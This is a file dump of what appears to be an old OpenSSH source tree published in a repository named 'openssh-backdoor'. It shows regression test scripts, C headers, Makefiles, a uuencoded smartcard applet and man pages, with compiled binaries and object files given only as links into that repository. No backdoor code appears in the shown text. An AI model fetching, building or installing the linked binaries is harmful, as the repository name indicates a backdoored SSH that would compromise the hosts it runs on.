Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="basic sftp put/get with ssh.com server" 5 | 6 | DATA=/bin/ls 7 | COPY=${OBJ}/copy 8 | 9 | BUFFERSIZE="5 1000 32000 64000" 10 | REQUESTS="1 2 10" 11 | 12 | #TEST_COMBASE=/path/to/ssh/com/binaries 13 | if [ "X${TEST_COMBASE}" = "X" ]; then 14 | fatal '$TEST_COMBASE is not set' 15 | fi 16 | 17 | VERSIONS=" 18 | 2.0.10 19 | 2.0.12 20 | 2.0.13 21 | 2.1.0 22 | 2.2.0 23 | 2.3.0 24 | 2.3.1 25 | 2.4.0 26 | 3.0.0 27 | 3.1.0 28 | 3.2.0 29 | 3.3.0" 30 | 31 | # go for it 32 | for v in ${VERSIONS}; do 33 | server=${TEST_COMBASE}/${v}/sftp-server2 34 | if [ ! -x ${server} ]; then 35 | continue 36 | fi 37 | verbose "sftp-server $v" 38 | for B in ${BUFFERSIZE}; do 39 | for R in ${REQUESTS}; do 40 | verbose "test $tid: buffer_size $B num_requests $R" 41 | rm -f ${COPY}.1 ${COPY}.2 42 | ${SFTP} -P ${server} -B $B -R $R -b /dev/stdin \ 43 | > /dev/null 2>&1 << EOF 44 | version 45 | get $DATA ${COPY}.1 46 | put $DATA ${COPY}.2 47 | EOF 48 | r=$? 49 | if [ $r -ne 0 ]; then 50 | fail "sftp failed with $r" 51 | fi 52 | cmp $DATA ${COPY}.1 || fail "corrupted copy after get" 53 | cmp $DATA ${COPY}.2 || fail "corrupted copy after put" 54 | done 55 | done 56 | done 57 | -------------------------------------------------------------------------------- /regress/stderr-after-eof.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: stderr-after-eof.sh,v 1.1 2002/03/23 16:38:09 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="stderr data after eof" 5 | 6 | DATA=/etc/motd 7 | DATA=${OBJ}/data 8 | COPY=${OBJ}/copy 9 | 10 | MD5=md5sum 11 | 12 | # setup data 13 | rm -f ${DATA} ${COPY} 14 | cp /dev/null ${DATA} 15 | for i in 1 2 3 4 5 6; do 16 | (date;echo $i) | $MD5 >> ${DATA} 17 | done 18 | 19 | ${SSH} -2 -F $OBJ/ssh_proxy otherhost \ 20 | exec sh -c \'"exec > /dev/null; sleep 2; cat ${DATA} 1>&2 $s"\' \ 21 | 2> ${COPY} 22 | r=$? 23 | if [ $r -ne 0 ]; then 24 | fail "ssh failed with exit code $r" 25 | fi 26 | egrep 'Disconnecting: Received extended_data after EOF' ${COPY} && 27 | fail "ext data received after eof" 28 | cmp ${DATA} ${COPY} || fail "stderr corrupt" 29 | 30 | rm -f ${DATA} ${COPY} 31 | -------------------------------------------------------------------------------- /regress/stderr-data.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: stderr-data.sh,v 1.2 2002/03/27 22:39:52 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="stderr data transfer" 5 | 6 | DATA=/bin/ls 7 | COPY=${OBJ}/copy 8 | rm -f ${COPY} 9 | 10 | for n in '' -n; do 11 | for p in 1 2; do 12 | verbose "test $tid: proto $p ($n)" 13 | ${SSH} $n -$p -F $OBJ/ssh_proxy otherhost \ 14 | exec sh -c \'"exec > /dev/null; sleep 3; cat ${DATA} 1>&2 $s"\' \ 15 | 2> ${COPY} 16 | r=$? 17 | if [ $r -ne 0 ]; then 18 | fail "ssh failed with exit code $r" 19 | fi 20 | cmp ${DATA} ${COPY} || fail "stderr corrupt" 21 | rm -f ${COPY} 22 | 23 | ${SSH} $n -$p -F $OBJ/ssh_proxy otherhost \ 24 | exec sh -c \'"echo a; exec > /dev/null; sleep 3; cat ${DATA} 1>&2 $s"\' \ 25 | > /dev/null 2> ${COPY} 26 | r=$? 27 | if [ $r -ne 0 ]; then 28 | fail "ssh failed with exit code $r" 29 | fi 30 | cmp ${DATA} ${COPY} || fail "stderr corrupt" 31 | rm -f ${COPY} 32 | done 33 | done 34 | -------------------------------------------------------------------------------- /regress/t4.ok: -------------------------------------------------------------------------------- 1 | 3b:dd:44:e9:49:18:84:95:f1:e7:33:6b:9d:93:b1:36 2 | -------------------------------------------------------------------------------- /regress/t5.ok: -------------------------------------------------------------------------------- 1 | xokes-lylis-byleh-zebib-kalus-bihas-tevah-haroz-suhar-foved-noxex 2 | -------------------------------------------------------------------------------- /regress/transfer.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: transfer.sh,v 1.1 2002/03/27 00:03:37 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="transfer data" 5 | 6 | DATA=/bin/ls 7 | COPY=${OBJ}/copy 8 | 9 | for p in 1 2; do 10 | verbose "$tid: proto $p" 11 | rm -f ${COPY} 12 | ${SSH} -n -q -$p -F $OBJ/ssh_proxy somehost cat ${DATA} > ${COPY} 13 | if [ $? -ne 0 ]; then 14 | fail "ssh cat $DATA failed" 15 | fi 16 | cmp ${DATA} ${COPY} || fail "corrupted copy" 17 | 18 | for s in 10 100 1k 32k 64k 128k 256k; do 19 | trace "proto $p dd-size ${s}" 20 | rm -f ${COPY} 21 | dd if=$DATA obs=${s} 2> /dev/null | \ 22 | ${SSH} -q -$p -F $OBJ/ssh_proxy somehost "cat > ${COPY}" 23 | if [ $? -ne 0 ]; then 24 | fail "ssh cat $DATA failed" 25 | fi 26 | cmp $DATA ${COPY} || fail "corrupted copy" 27 | done 28 | done 29 | rm -f ${COPY} 30 | -------------------------------------------------------------------------------- /regress/try-ciphers.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: try-ciphers.sh,v 1.7 2002/04/03 09:30:01 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="try ciphers" 5 | 6 | ciphers="aes128-cbc 3des-cbc blowfish-cbc cast128-cbc arcfour 7 | aes192-cbc aes256-cbc rijndael-cbc@lysator.liu.se" 8 | macs="hmac-sha1 hmac-md5 hmac-sha1-96 hmac-md5-96" 9 | 10 | for c in $ciphers; do 11 | for m in $macs; do 12 | trace "proto 2 cipher $c mac $m" 13 | verbose "test $tid: proto 2 cipher $c mac $m" 14 | ${SSH} -F $OBJ/ssh_proxy -2 -m $m -c $c somehost true 15 | if [ $? -ne 0 ]; then 16 | fail "ssh -2 failed with mac $m cipher $c" 17 | fi 18 | done 19 | done 20 | 21 | ciphers="3des blowfish" 22 | for c in $ciphers; do 23 | trace "proto 1 cipher $c" 24 | verbose "test $tid: proto 1 cipher $c" 25 | ${SSH} -F $OBJ/ssh_proxy -1 -c $c somehost true 26 | if [ $? -ne 0 ]; then 27 | fail "ssh -1 failed with cipher $c" 28 | fi 29 | done 30 | -------------------------------------------------------------------------------- /regress/yes-head.sh: -------------------------------------------------------------------------------- 1 | # $OpenBSD: yes-head.sh,v 1.4 2002/03/15 13:08:56 markus Exp $ 2 | # Placed in the Public Domain. 3 | 4 | tid="yes pipe head" 5 | 6 | for p in 1 2; do 7 | lines=`${SSH} -$p -F $OBJ/ssh_proxy thishost 'yes | head -2000' | (sleep 3 ; wc -l)` 8 | if [ $? -ne 0 ]; then 9 | fail "yes|head test failed" 10 | lines = 0; 11 | fi 12 | if [ $lines -ne 2000 ]; then 13 | fail "yes|head returns $lines lines instead of 2000" 14 | fi 15 | done 16 | -------------------------------------------------------------------------------- /rijndael.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: rijndael.h,v 1.12 2001/12/19 07:18:56 deraadt Exp $ */ 2 | 3 | /** 4 | * rijndael-alg-fst.h 5 | * 6 | * @version 3.0 (December 2000) 7 | * 8 | * Optimised ANSI C code for the Rijndael cipher (now AES) 9 | * 10 | * @author Vincent Rijmen 11 | * @author Antoon Bosselaers 12 | * @author Paulo Barreto 13 | * 14 | * This code is hereby placed in the public domain. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE AUTHORS ''AS IS'' AND ANY EXPRESS 17 | * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 18 | * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 19 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE 20 | * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 21 | * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 22 | * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR 23 | * BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 24 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE 25 | * OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, 26 | * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | #ifndef __RIJNDAEL_H 29 | #define __RIJNDAEL_H 30 | 31 | #define MAXKC (256/32) 32 | #define MAXKB (256/8) 33 | #define MAXNR 14 34 | 35 | typedef unsigned char u8; 36 | typedef unsigned short u16; 37 | typedef unsigned int u32; 38 | 39 | /* The structure for key information */ 40 | typedef struct { 41 | int decrypt; 42 | int Nr; /* key-length-dependent number of rounds */ 43 | u32 ek[4*(MAXNR + 1)]; /* encrypt key schedule */ 44 | u32 dk[4*(MAXNR + 1)]; /* decrypt key schedule */ 45 | } rijndael_ctx; 46 | 47 | void rijndael_set_key(rijndael_ctx *, u_char *, int, int); 48 | void rijndael_decrypt(rijndael_ctx *, u_char *, u_char *); 49 | void rijndael_encrypt(rijndael_ctx *, u_char *, u_char *); 50 | 51 | #endif /* __RIJNDAEL_H */ 52 | -------------------------------------------------------------------------------- /rijndael.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/rijndael.o -------------------------------------------------------------------------------- /rsa.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: rsa.h,v 1.15 2002/03/04 17:27:39 stevesk Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * RSA key generation, encryption and decryption. 8 | * 9 | * As far as I am concerned, the code I have written for this software 10 | * can be used freely for any purpose. Any derived versions of this 11 | * software must be clearly marked as such, and if the derived work is 12 | * incompatible with the protocol description in the RFC file, it must be 13 | * called by a name other than "ssh" or "Secure Shell". 14 | */ 15 | 16 | #ifndef RSA_H 17 | #define RSA_H 18 | 19 | #include 20 | #include 21 | 22 | void rsa_public_encrypt(BIGNUM *, BIGNUM *, RSA *); 23 | int rsa_private_decrypt(BIGNUM *, BIGNUM *, RSA *); 24 | void rsa_generate_additional_parameters(RSA *); 25 | 26 | #endif /* RSA_H */ 27 | -------------------------------------------------------------------------------- /rsa.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/rsa.o -------------------------------------------------------------------------------- /scard-opensc.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/scard-opensc.c -------------------------------------------------------------------------------- /scard.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: scard.h,v 1.11 2002/06/30 21:59:45 deraadt Exp $ */ 2 | 3 | /* 4 | * Copyright (c) 2001 Markus Friedl. All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 1. Redistributions of source code must retain the above copyright 10 | * notice, this list of conditions and the following disclaimer. 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 25 | */ 26 | 27 | #ifndef SCARD_H 28 | #define SCARD_H 29 | 30 | #include "key.h" 31 | 32 | #define SCARD_ERROR_FAIL -1 33 | #define SCARD_ERROR_NOCARD -2 34 | #define SCARD_ERROR_APPLET -3 35 | 36 | Key **sc_get_keys(const char *, const char *); 37 | void sc_close(void); 38 | int sc_put_key(Key *, const char *); 39 | 40 | #endif 41 | -------------------------------------------------------------------------------- /scard.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/scard.o -------------------------------------------------------------------------------- /scard/.cvsignore: -------------------------------------------------------------------------------- 1 | Makefile 2 | Ssh.bin 3 | -------------------------------------------------------------------------------- /scard/Makefile: -------------------------------------------------------------------------------- 1 | # $Id: Makefile.in,v 1.4 2002/04/26 01:25:41 djm Exp $ 2 | 3 | prefix=/usr/local 4 | datadir=${prefix}/share 5 | srcdir=. 6 | top_srcdir=.. 7 | 8 | INSTALL=/usr/bin/install -c 9 | 10 | 11 | 12 | all: 13 | 14 | #Ssh.bin: Ssh.bin.uu 15 | # uudecode Ssh.bin.uu 16 | 17 | clean: 18 | # rm -rf Ssh.bin 19 | 20 | distprep: 21 | uudecode Ssh.bin.uu 22 | 23 | distclean: clean 24 | rm -f Makefile *~ 25 | 26 | install: $(srcdir)/Ssh.bin 27 | $(top_srcdir)/mkinstalldirs $(DESTDIR)$(datadir) 28 | $(INSTALL) -m 0644 $(srcdir)/Ssh.bin $(DESTDIR)$(datadir)/Ssh.bin 29 | -------------------------------------------------------------------------------- /scard/Makefile.in: -------------------------------------------------------------------------------- 1 | # $Id: Makefile.in,v 1.4 2002/04/26 01:25:41 djm Exp $ 2 | 3 | prefix=@prefix@ 4 | datadir=@datadir@ 5 | srcdir=@srcdir@ 6 | top_srcdir=@top_srcdir@ 7 | 8 | INSTALL=@INSTALL@ 9 | 10 | VPATH=@srcdir@ 11 | 12 | all: 13 | 14 | #Ssh.bin: Ssh.bin.uu 15 | # uudecode Ssh.bin.uu 16 | 17 | clean: 18 | # rm -rf Ssh.bin 19 | 20 | distprep: 21 | uudecode Ssh.bin.uu 22 | 23 | distclean: clean 24 | rm -f Makefile *~ 25 | 26 | install: $(srcdir)/Ssh.bin 27 | $(top_srcdir)/mkinstalldirs $(DESTDIR)$(datadir) 28 | $(INSTALL) -m 0644 $(srcdir)/Ssh.bin $(DESTDIR)$(datadir)/Ssh.bin 29 | -------------------------------------------------------------------------------- /scard/Ssh.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/scard/Ssh.bin -------------------------------------------------------------------------------- /scard/Ssh.bin.uu: -------------------------------------------------------------------------------- 1 | begin 644 Ssh.bin 2 | M`P)!&P`801X`>``!`E@"`/Y@\`4`_J'P!0!!&T$=`?Z@\`4`01M!'`'^>/,! 3 | M`4$;01X!_G#S%P'^0],1`?Y@\!0`_G/S'0#^<]4``D$;L`4`_F'3``#^8=,% 4 | M`/ZAT`$!_J#0)P'^H],*`?ZCTPD`_G/5"P7^8=,'`OZAT`H`_J#0$@3^:-,@ 5 | M`T$;`P`%`/Y@`\A```/`0__(%`@8!`0H``&`` 6 | M0205!!D)I$L`"0J0`&``*!4$&58``````.P````%____P````.D````0```` 7 | M,P```"````#'````,````(T````R````V!4#&0A*``D*;@!@`"@5!QD*`/\] 8 | M(6``1A)*``D*9P!@`"@*/P!@`$LK"1)@`$LK!6``4!P$#00#2@`.#01@`%5@ 9 | M`%I@`"@37``>%0@2%0A>`%\($F``9%(`:`H_`&``2RL*7@`R10`/$UP`'@H`R`D07@`W!%>P!?_R`0$$`@`\```37P`` 14 | M$V+^H2U?``5=``H38OZ@+5\`#UT`%!-B_G@M"@0`7P`970`>"@0`8``C10`) 15 | /"F<`8``H$UX`+5D````` 16 | ` 17 | end 18 | -------------------------------------------------------------------------------- /scp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/scp -------------------------------------------------------------------------------- /scp.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/scp.o -------------------------------------------------------------------------------- /servconf.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/servconf.o -------------------------------------------------------------------------------- /serverloop.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: serverloop.h,v 1.5 2001/06/27 02:12:53 markus Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | /* 15 | * Performs the interactive session. This handles data transmission between 16 | * the client and the program. Note that the notion of stdin, stdout, and 17 | * stderr in this function is sort of reversed: this function writes to stdin 18 | * (of the child program), and reads from stdout and stderr (of the child 19 | * program). 20 | */ 21 | #ifndef SERVERLOOP_H 22 | #define SERVERLOOP_H 23 | 24 | void server_loop(pid_t, int, int, int); 25 | void server_loop2(Authctxt *); 26 | 27 | #endif 28 | -------------------------------------------------------------------------------- /serverloop.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/serverloop.o -------------------------------------------------------------------------------- /session.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/session.o -------------------------------------------------------------------------------- /sftp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sftp -------------------------------------------------------------------------------- /sftp-client.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sftp-client.o -------------------------------------------------------------------------------- /sftp-common.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: sftp-common.h,v 1.4 2002/09/11 22:41:50 djm Exp $ */ 2 | 3 | /* 4 | * Copyright (c) 2001 Markus Friedl. All rights reserved. 5 | * Copyright (c) 2001 Damien Miller. All rights reserved. 6 | * 7 | * Redistribution and use in source and binary forms, with or without 8 | * modification, are permitted provided that the following conditions 9 | * are met: 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 17 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 18 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 19 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 20 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 21 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 22 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 23 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 24 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 25 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 26 | */ 27 | 28 | typedef struct Attrib Attrib; 29 | 30 | /* File attributes */ 31 | struct Attrib { 32 | u_int32_t flags; 33 | u_int64_t size; 34 | u_int32_t uid; 35 | u_int32_t gid; 36 | u_int32_t perm; 37 | u_int32_t atime; 38 | u_int32_t mtime; 39 | }; 40 | 41 | void attrib_clear(Attrib *); 42 | void stat_to_attrib(struct stat *, Attrib *); 43 | void attrib_to_stat(Attrib *, struct stat *); 44 | Attrib *decode_attrib(Buffer *); 45 | void encode_attrib(Buffer *, Attrib *); 46 | char *ls_file(char *, struct stat *, int); 47 | 48 | const char *fx2txt(int); 49 | -------------------------------------------------------------------------------- /sftp-common.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sftp-common.o -------------------------------------------------------------------------------- /sftp-glob.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: sftp-glob.h,v 1.8 2002/09/11 22:41:50 djm Exp $ */ 2 | 3 | /* 4 | * Copyright (c) 2001,2002 Damien Miller. All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 1. Redistributions of source code must retain the above copyright 10 | * notice, this list of conditions and the following disclaimer. 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 25 | */ 26 | 27 | /* Remote sftp filename globbing */ 28 | 29 | #ifndef _SFTP_GLOB_H 30 | #define _SFTP_GLOB_H 31 | 32 | #include "sftp-client.h" 33 | 34 | int remote_glob(struct sftp_conn *, const char *, int, 35 | int (*)(const char *, int), glob_t *); 36 | 37 | #endif 38 | -------------------------------------------------------------------------------- /sftp-glob.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sftp-glob.o -------------------------------------------------------------------------------- /sftp-int.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: sftp-int.h,v 1.6 2003/01/08 23:53:26 djm Exp $ */ 2 | 3 | /* 4 | * Copyright (c) 2001,2002 Damien Miller. All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 1. Redistributions of source code must retain the above copyright 10 | * notice, this list of conditions and the following disclaimer. 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 25 | */ 26 | 27 | int interactive_loop(int, int, char *, char *); 28 | -------------------------------------------------------------------------------- /sftp-int.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sftp-int.o -------------------------------------------------------------------------------- /sftp-server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sftp-server -------------------------------------------------------------------------------- /sftp-server.0: -------------------------------------------------------------------------------- 1 | SFTP-SERVER(8) BSD System ManagerM-bM-^@M-^Ys Manual SFTP-SERVER(8) 2 | 3 | NAME 4 | sftp-server - SFTP server subsystem 5 | 6 | SYNOPSIS 7 | sftp-server 8 | 9 | DESCRIPTION 10 | sftp-server is a program that speaks the server side of SFTP protocol to 11 | stdout and expects client requests from stdin. sftp-server is not 12 | intended to be called directly, but from sshd(8) using the Subsystem 13 | option. See sshd(8) for more information. 14 | 15 | SEE ALSO 16 | sftp(1), ssh(1), sshd(8) 17 | 18 | T. Ylonen and S. Lehtinen, SSH File Transfer Protocol, draft-ietf-secsh- 19 | filexfer-00.txt, January 2001, work in progress material. 20 | 21 | AUTHORS 22 | Markus Friedl 23 | 24 | HISTORY 25 | sftp-server first appeared in OpenBSD 2.8 . 26 | 27 | BSD August 30, 2000 BSD 28 | -------------------------------------------------------------------------------- /sftp-server.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sftp-server.o -------------------------------------------------------------------------------- /sftp.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/sftp.o -------------------------------------------------------------------------------- /ssh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh -------------------------------------------------------------------------------- /ssh-add: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-add -------------------------------------------------------------------------------- /ssh-add.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-add.o -------------------------------------------------------------------------------- /ssh-agent: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-agent -------------------------------------------------------------------------------- /ssh-agent.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-agent.o -------------------------------------------------------------------------------- /ssh-dss.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-dss.o -------------------------------------------------------------------------------- /ssh-keygen: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-keygen -------------------------------------------------------------------------------- /ssh-keygen.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-keygen.o -------------------------------------------------------------------------------- /ssh-keyscan: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-keyscan -------------------------------------------------------------------------------- /ssh-keyscan.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-keyscan.o -------------------------------------------------------------------------------- /ssh-keysign: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/ssh-keysign -------------------------------------------------------------------------------- /ssh-keysign.0: -------------------------------------------------------------------------------- 1 | SSH-KEYSIGN(8) 